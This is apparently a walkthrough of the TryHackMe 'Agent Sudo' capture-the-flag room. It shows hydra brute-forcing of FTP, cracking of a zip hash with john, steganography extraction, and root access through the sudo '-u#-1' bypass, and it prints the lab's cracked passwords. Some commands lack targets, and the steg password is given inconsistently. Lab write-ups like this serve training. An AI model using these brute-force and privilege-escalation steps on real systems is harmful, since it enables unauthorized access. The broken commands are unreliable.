TryHackMe Agent Sudo CTF Room Walkthrough

  • Target Machine IP: 10.224.129/


nmap scan: nmap -sV -sC -Pn -oN scan.txt

  • Q. How many open ports?


    From Nmap scan

  • Q. How you redirect yourself to a secret page?


    visit Website

  • Q. What is the agent name?


    Change user agent header from mozilla/chrome to C to access website contents

Hash Cracking and Bruteforce

  • Using hydra:

    hydra -l chris -P /usr/share/wordlists/rockyou.txt

    FTP login details chris:crystal

  • Q. FTP password

  • Now, access FTP service and download files from the FTP server with username chris and password crystal.

    # Enter username and password when prompted
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
    -rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
    -rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
    226 Directory send OK.
    # now Download files
    > mget * .
  • After downloading files, cat To_agentJ.txt we know that password is hidden in one of the images:

    Dear agent J,
    All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
    Agent C
  • We use binwalk to get information stored in the files

    $ binwalk -e cute-alien.jpg
    0             0x0             JPEG image data, JFIF standard 1.01
    # cute-alien.jpg does not contain hidden password
    $ binwalk -e cutie.png
    0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
    869           0x365           Zlib compressed data, best compression
    34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
    34820         0x8804          End of Zip archive, footer length: 22
    # hence, cutie.png file contains hidden information in zip file which, these files will be separated into a folder _cutie.png.extracted
  • We can use zip2john tool to convert zip into a crackable hash format by john the ripper

    zip2john > ziphash.txt
  • Use john tool to crack file

    john ziphash.txt

    password: alien

  • Q. Zip file password

  • Use password and unzip the zip file and read To_agentR.txt file

    Agent C,
    We need to send the picture to 'QXJlYTUx' as soon as possible!
    Agent R

    QXJlYTUx is base64 encoded, we can use cyberchef project to decode string
    decoded string: Area51 which seems to be the steg password for cute-alien.jpg image

  • Q. steg password

  • Extract Message from cute-alien.jpg using

    steghide extract -sf cute-alien.jpg
    # Enter Alien51 as password

    Data will be extracted and saved in message.txt file

  • Read message.txt file

    cat message.txt


    Hi james,
    Glad you find this message. Your login password is hackerrules!
    Don't ask me why the password look cheesy, ask agent R who set this password for you.
    Your buddy,
  • Q. Who is the other agent (in full name)?

  • Q. SSH password


Capture The User Flag

  • Login to james account using SSH

  • The User Flag is located in the home directory james

    [email protected]:~$ cat user_flag.txt
  • Q. What is the user flag?

  • Copy Alien_autospy.jpg photo to attacker’s machine

    scp [email protected]:~/Alien_autospy.jpg .
  • Using Google Image Search and uploading image, we get various search results but using hint, we need results from Fox News, which leads us to Fox News Page, whose headlines gives us the answer

  • Q. What is the incident of the photo called?

    Roswell alien autopsy

Privilege Escalation

  • Finding SUIDs

    find / -perm -u=s -type f 2>/dev/null

    from output of above command we’re able to run sudo command

  • Listing commands available to user james to use with sudo

    [email protected]:~$ sudo -l
    [sudo] password for james:
    Matching Defaults entries for james on agent-sudo:
        env_reset, mail_badpass,
    User james may run the following commands on agent-sudo:
        (ALL, !root) /bin/bash

    On searching (ALL, !root) /bin/bash on search engine it leads to an exploit-db search

  • Q. CVE number for the escalation

  • From exploit program comments using below exploit, we get root user bash

    [email protected]:~$ sudo -u#-1 /bin/bash
    [email protected]:~#
  • Root Flags are usually located in /root/, navigating and reading the file we get

    [email protected]:/root# cat root.txt
    To Mr.hacker,
    Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
    Your flag is
    DesKel a.k.a Agent R
  • Q. What is the root flag?

  • Q. (Bonus) Who is Agent R?